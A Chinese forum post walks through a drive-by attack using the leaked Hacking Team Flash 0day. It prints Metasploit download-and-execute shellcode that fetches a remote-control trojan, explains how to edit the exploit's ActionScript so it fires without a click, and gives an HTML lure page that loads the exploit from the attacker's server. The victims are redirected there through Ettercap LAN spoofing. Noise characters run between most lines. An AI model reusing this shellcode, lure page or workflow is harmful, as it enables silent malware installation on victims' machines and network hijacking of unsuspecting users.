|
3 @3 T+ T3 }' ^) M
三、flash 0day之手工代码修改制作下载者实例入侵演示 & Z+ i4 Q" P% M( O6 r! j, c5 E
* H- C) H5 X9 ~
- d& V: U* [ ?- k3 i; g6 b! L 利用到的工具: ( f! j8 {0 l8 z
) U4 m% y* a1 [: N: n2 Z z4 z: {. D
+ S8 @, b `: `: F Msf ) k, ^1 o9 p' n! F
% \: j; v6 ~1 E1 U9 g* C
6 i5 |7 [9 l" ^7 _. {# D Ettercap
6 {2 G3 E8 s0 ~* t y, L Z 2 V. j r: {; I1 R; ^
9 X5 s C- Y6 Y7 |- l* g9 S2 e
Adobe Flash CS6 . n" O7 V- l$ {6 P/ |
5 [3 V) K% R( I2 e# X8 }5 ^ P. F' R/ c7 ^3 x( R" ^# X* m( d- {
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 + `& j$ U9 e; b6 c% L) C& I
, ?7 ]: q: ~9 G
7 o3 \8 {0 ]! ^- \1 k% F2 n 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 2 D& V8 c$ S: c" S' H% h
}! J4 d. ~6 R: L$ V, m$ p; v% t+ b, E( o
如图: 2 I3 G' ~) r. }
b$ g n1 T% h
: K' _- ]# M4 n4 A- J0 n ( ~5 [4 V- l" Z& {7 S, r
8 C8 A! X9 C& F) u$ Z* K* Z! \2 H; r$ Q9 x$ j# v3 ~" T
3 j3 ` Y7 j! b% o3 G/ F g+ Q0 | j# q& o0 Q* A9 S
: ]" x0 |2 o( c {0 L7 |7 o
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' ?) `9 a: p; j7 b m/ S3 L
2 m# j, _2 y/ n. H% I! C1 Q1 [
' y0 k/ c! b2 S3 |! F$ L
5 y5 p2 E% K: A5 _& W# h
3 O! {' z$ k4 p- X$ c6 {- D
8 s* F8 x3 s" Y% N& r/ N. d  % h% W8 m4 [' H" b" S2 R0 t
- N% @! o& u4 r4 v* j
+ Z. z) T+ [9 d4 R$ f 然后执行generate -t dword生成shellcode,如下: 8 A/ L! z! |5 k8 T$ h% f
' r* ^. Z& l: g( W
2 Q: o' x6 w- a* c3 q
 & i# X& A6 B. q
! f4 r0 F- L6 ^6 l
, _5 q/ O" [+ O, l
复制代码到文本下便于我们一会编辑flash exp,如下: ; L$ Y8 ^8 p, M# x
: A' n9 l6 p" X* x
7 ?# D6 X! s7 A. |6 ^ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
& g. ]9 V( M' H& S1 K& v6 } + m( d& I+ w$ R" R+ W: }
" u& D- |, r& N6 i+ d& t1 v7 i 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
, [7 ~9 f9 l* }3 K3 K; }2 v( T
+ a$ X1 s q& ]7 A
1 w; N' |+ T5 w: U 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
( z5 @' {- v) y0 g' @
* t; C3 D8 J/ Q4 ~# B4 _$ F+ g0 V1 J- ^' \/ R3 Z$ Z. A
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 5 x! V" l' z% j: S$ O
. n# B( f# w4 P2 q5 l1 z, v- d
. v6 e9 y& w& x. _: R 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
6 j! ]: ~/ [ w; W/ B% m9 o 6 v3 v! L% q- j# Z4 u
1 U$ y: ~9 i" I 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, : z* r2 D2 Y5 ^& b- K& A. E! C
/ f P/ Q0 _. s$ O+ Q
* @; l7 A: R h 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ; V. K, Q5 L! V' ~; S
m. R. t. X# M6 Z% V5 y
, l' b( B/ ]3 k* u# Q! \ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
+ \! q+ |) F& X j% d; N/ |2 t% ~ / O* Z! ^4 h _- X( T( O
- d# \9 j! c+ [. C$ o# E 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, & W& c- \8 ^" {% e
" l7 s% S5 d! b" k9 n4 N3 k
4 F9 @2 L f' f" p0 p- x: i
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
& u. N5 `% U+ L& c7 d' v1 A # s- i' S+ G- f. C+ \
4 v0 Z! B6 r; C' m! {4 {# U
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 2 P" f8 j* L6 H6 s
: f( C% ]$ Z% J# B- v" ?: L" ]% A% W
( m5 [3 M: e- {$ n# X7 o5 g. G1 t8 L8 l
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
4 z- b+ e u) L* G! I3 X
/ z. V5 m( f7 u6 w+ Q* k, v
6 e& J! {0 q5 y v' P, } 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 x) Y! c# m& E$ a* ]9 _
3 t; a4 @! {" C# {6 ^, `, J& A
3 t6 s* K. Q: n$ Y2 l1 N1 L
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
6 D' t2 ~' u, s, E2 `" s9 m
+ V% B* a5 U4 S- F/ d( n: |3 _1 U+ E2 S: y5 L2 [" n' [8 j+ {
, N+ D8 [8 l# P; o6 K. l: o
1 v/ O$ [6 O% e4 {
9 v) w4 Z* g1 T0 H& ~ Q! ]
( f' j7 |5 V# r: y
2 g8 E4 R$ R" x" L$ w5 J
8 d y8 @) ]; n, J/ [$ b; }0 Y 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
0 f* A3 G; k! z! H
$ Y3 e2 m2 f& ]* F2 Z, x0 T) R2 J- q' ?, G6 X
: t) I6 y" J$ w$ G; ~$ [% p
$ G, a* p7 V2 k+ `4 @# S+ d! B7 U- c/ W9 z+ t2 Y1 g
先修改ShellWin32.as,部分源代码如图: / H; N; ~8 Q1 g0 \8 q$ X$ c
- q) B0 s1 A0 q. i: Q1 b
! ^+ V: g. q0 _1 `# O B4 X
 9 p! ~: b& b, g6 T8 t) c
6 o8 b# A. e: U( N1 F2 d4 Q
) D& H& b( t& K+ v5 Z2 h0 a 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
. C1 G4 @- V8 J7 I + [+ {. t9 s; S O( q- T8 q; J
8 y8 H7 W7 D1 k6 j& C, { {
 ; h" L7 U8 ^) m; _4 E
! {- t/ M, s& r4 r- o: Z0 M. V/ n$ x( L: n
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ( F7 L* B0 p) f' B
3 w4 f- {7 X! b; \" r7 g- G. `3 n: D. \0 E4 U
, K3 c7 L+ a) M: s: q( c& q - n) ^+ B( F2 P1 n# J6 Z- j8 K* o/ e
6 G5 x g) X, j; `! @4 P& b5 d 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 7 D1 ~4 s4 _5 e% j& a
! j0 h0 W j) J6 ^# I$ A) t, _5 q% q$ w; d' `
7 s0 r" L2 @# t5 v. k8 Y2 E. f
8 A0 I' d/ k: ^" Y" A6 H5 \9 P+ q+ t- }1 g5 u) f7 `9 C
, a/ L& r) N& ?% |
, q, a1 c# f8 K; k7 p, T
% h+ g: c2 z/ X3 U& `. I8 S, h
 ! F4 ^. g" O6 {* [: v
* v# N' r3 Y* b0 T
0 H( g V: n/ Z( ^) \* m5 y 然后点保存,下面我们来编译一下,打开 " y! t/ z, B0 B7 _: u! I
& v: z. s! P& M" T
. N3 x1 v! H' C) C; n exp1.fla然后点文件-发布,看看编译没错误
x$ b3 ]3 k9 V" V4 B) {7 j 1 U2 G9 r8 P2 j& k5 s
' f- T/ X4 A/ g5 B/ y
4 j0 G# g8 N9 _/ o
2 Q) x- q+ @5 K( W) h- @" w6 W! h
( W5 n9 o$ N. a- ^" ]/ A
% p2 ~/ ^& G, d # I! D4 H" s. n5 W* @
6 E/ E, F0 O% I2 e* U6 B! @
3 Q3 x$ ^ s$ \
5 F" ]5 D% b* k" d
- J: h" d! H& W6 h' d0 N 
F2 d, a3 x4 i 3 z7 q2 R1 i: p% G5 u; o6 Y; W
3 U: R: @% k& j- f 然后我们把生成的 5 O. _- B( r. N7 K
5 [! {* l" S8 ^5 ^1 z
M' h8 N# _- a exp1.swf丢到kailinux 的/var/www/html下:
: i) z( ?( r) ]9 ]
+ A# J V D& C+ s$ F3 [& a' y( k. U, Q0 N8 Y
然后把这段代码好好编辑一下 & h, n6 j. k' F) O
& D6 O6 j1 M; J/ j# [
E- z+ U( B& O. W7 H4 H
& q4 M+ n5 }7 s7 h
5 ]) u6 k4 C2 Y! v9 @4 r+ l# P* o2 J. |/ ~! o' w0 X
) _! m* k1 S* n ?& l+ G
$ L% A. p; [. W0 ?. {: `8 i& \/ H" W7 w
/ o$ f# u5 C* K- S: u
* Y, i6 j1 ^* L" X; r% O
2 C% ?4 r) {+ X" X: O
' r% N) Q( Q( R9 d# q% d4 ]5 K 2 k/ w$ K0 W1 U' E/ O n1 B9 n0 w
3 g6 P- ]4 o5 v7 J
- p0 a2 S' u5 V: y; A5 r0 d 1 D% y6 E2 V8 b) V. I, [
+ k$ }+ C L5 w
$ Q* Q7 \, c2 W! R4 k
8 A! Z0 ~& O+ Y. }$ P* A+ G* Y7 u* A3 @7 g( E% j4 s8 U
<!DOCTYPE html>
7 ~- l5 o9 {# n+ D( m
+ U: S p# r& @$ D, n7 c. m r9 c0 P
<html>
5 a+ H" {+ U# g+ M: [8 T 8 P' E' [* \/ `
3 v9 I6 E3 E: ^' p1 {0 R" i
<head>
* ]! w6 V. K4 v* f
6 v/ z* _. F* o ~ l2 i8 s" u: V$ |
<meta http-equiv="Content-Type" content="text/html; + u7 c( v7 R) B) l8 n6 c: o; m
6 P& T8 m% s8 T+ q- y6 K }9 b, j
( _. x# \1 j# O/ _0 n( A1 M' C
charset=utf-8"/> 7 P, B" r. p' M4 x+ O
8 Y u7 F8 ?% _7 U2 Q+ q
- f+ w6 s. V& M# q
</head> 6 ]! g6 w2 H5 X2 r% t4 W
* o0 s; W, _) u( C& p% z+ z# P$ ]
<body> k& S7 e. Z. s
( f7 I1 l# F# X% M/ c( H' r& ]8 W8 K F8 M) g, t8 M/ m
<h2> Please wait, the requested page is loading...</h2>
/ G- n+ Y9 Z1 \8 d 5 A* r& y& `4 A$ I. v5 c$ }
9 t& x; t9 p3 ? <br> 1 P( s3 G' i1 t$ ~8 k
' y k5 m) K4 r% i0 a4 k1 ^
) z) ~; g/ q# N1 L <OBJECT
8 Z3 [* c& l1 p
D H o1 x6 Q) R! T) T
; w9 E1 x7 o% r0 p, n' a2 D classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
3 \- M' r) f6 ?8 U( R! i4 v
2 k0 U a8 B O% f
' F6 l0 r Y! J VALUE="http://192.168.0.109/exp1.swf"></OBJECT> - Y2 \+ d) K c
2 D# L/ u. O4 Z# r- T
1 v/ G5 I1 G. j: F1 Q8 x6 i& w3 O
</body> ' x; |3 P0 Q9 R. E
/ o; P) s0 s. z0 x4 z5 t
0 k( m' @+ p# X& k7 f1 e2 I <script> 0 z2 Q; G4 a; }
9 k, x4 H0 T$ m9 y% N3 M' q: [! I
8 p% ^' k p* F Y8 [
setTimeout(function () { 2 W1 x: _8 {6 p6 {* q
& Q' ?- i& H! N2 `7 T$ ?" ?
* }& o. t+ s- }
9 R0 a& ]. r1 x* w Q 1 e b; K+ Y. A- J6 q
" w+ Q% J. z9 R& s! d8 J2 d8 x
window.location.reload();
0 w, n l8 Q. W3 B) q2 s: D . j; @9 t4 T5 M
; J5 r; S9 W1 o- F }, 10000); 8 h$ H5 `9 \8 V9 M3 m/ W
) X; i j& G) b# L" ~+ ?
0 r, g7 T3 q. ]* h% S8 E - {4 x" E6 g" C# a& ]
1 d8 Q* d: p# F- Q" p6 b; m/ X7 i* {. S+ F/ `: ^
</script>
0 o( t; U8 |1 \' C2 b0 l " U' {! t/ D2 T7 N4 {
+ R: B! Y4 |! Q$ q
</html> & b* j: v; _% e* C. u0 o7 C7 n
* i9 H ~) R8 V% I2 H' ] a) ~6 v3 l6 a2 d$ z
8 k1 A& H- e3 \& c # n" h; s# N( ^2 K
+ x3 m: E2 N$ F+ q9 k' I' n+ d6 @ 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
% J$ }+ x6 f1 q, ]2 s " x& a; e8 G% p. ~2 W) ]
! z1 i( P ?. G1 t
 5 q: N- p8 M9 H8 I
[5 X4 U4 X+ I3 G; d9 g% U' _) I
1 ?( M! D8 }; @+ h. P
6 y+ P, m( G8 ]
: {8 g# ]& G- r5 n0 ~! i# y
0 T! V" [( m1 _. K& U2 S8 H1 X4 Y
+ a$ f$ r, N1 v+ X- h
8 g9 R! i" ]1 H& O7 E6 ~1 ]& Q
\# l8 B5 K; C) ]9 x4 x- E
2 t1 G% q, ~- V0 e+ w8 g( g# ]
" x4 V2 ` J8 s w5 k: y9 q- Z7 U2 u# }. M2 K. N: [1 s
' Q- T l, q! E3 ^0 f1 z; F T" h
+ L; x, ^! k$ p5 p y8 z. ]& B9 g/ z( f- a8 M
下面我们用ettercap欺骗如图:
& u# e, U6 R# B6 _5 N # z0 \2 P7 d! H7 ~0 k2 d
3 ^3 a# R1 `, N# t+ z; e: R- \
 4 I9 W( h- t/ l7 x1 J
2 [& `# M4 f; m$ x! \
. a( [2 g2 D) i9 C9 J( B
3 j, i+ g1 X* V( f) q0 z* M4 F& n. I$ i
! A' x1 Y1 Q: B
5 ^, Z% i9 a& l) Q- ^, Y
下面我们随便访问个网站看看:
+ `7 {# D2 X- x( b. d% p' r* g" a! }4 q
- y T( O5 S% W6 [% |2 b
' P1 D2 @# k# _6 u& ~2 p 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 8 m7 e, L6 t4 v6 b& ^4 e3 A
0 b0 v! @. ?$ |8 J3 W; X- O
& j& \& h, o, q+ W6 g; R( W 
" G( K B' L1 P: V ; @( k: z$ c" w8 a
8 r& u3 p5 B% {( t- k3 K. w5 t5 z
我们看另一台, 8 U0 I% D+ s. u% K' M5 d
$ h3 Q2 b: M5 c8 ?8 n& `: B
( I: c6 h: b8 D$ @
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
; y3 {6 W. s: B' F | 
发表于 2018-10-20 20:28:55
收藏
支持
反对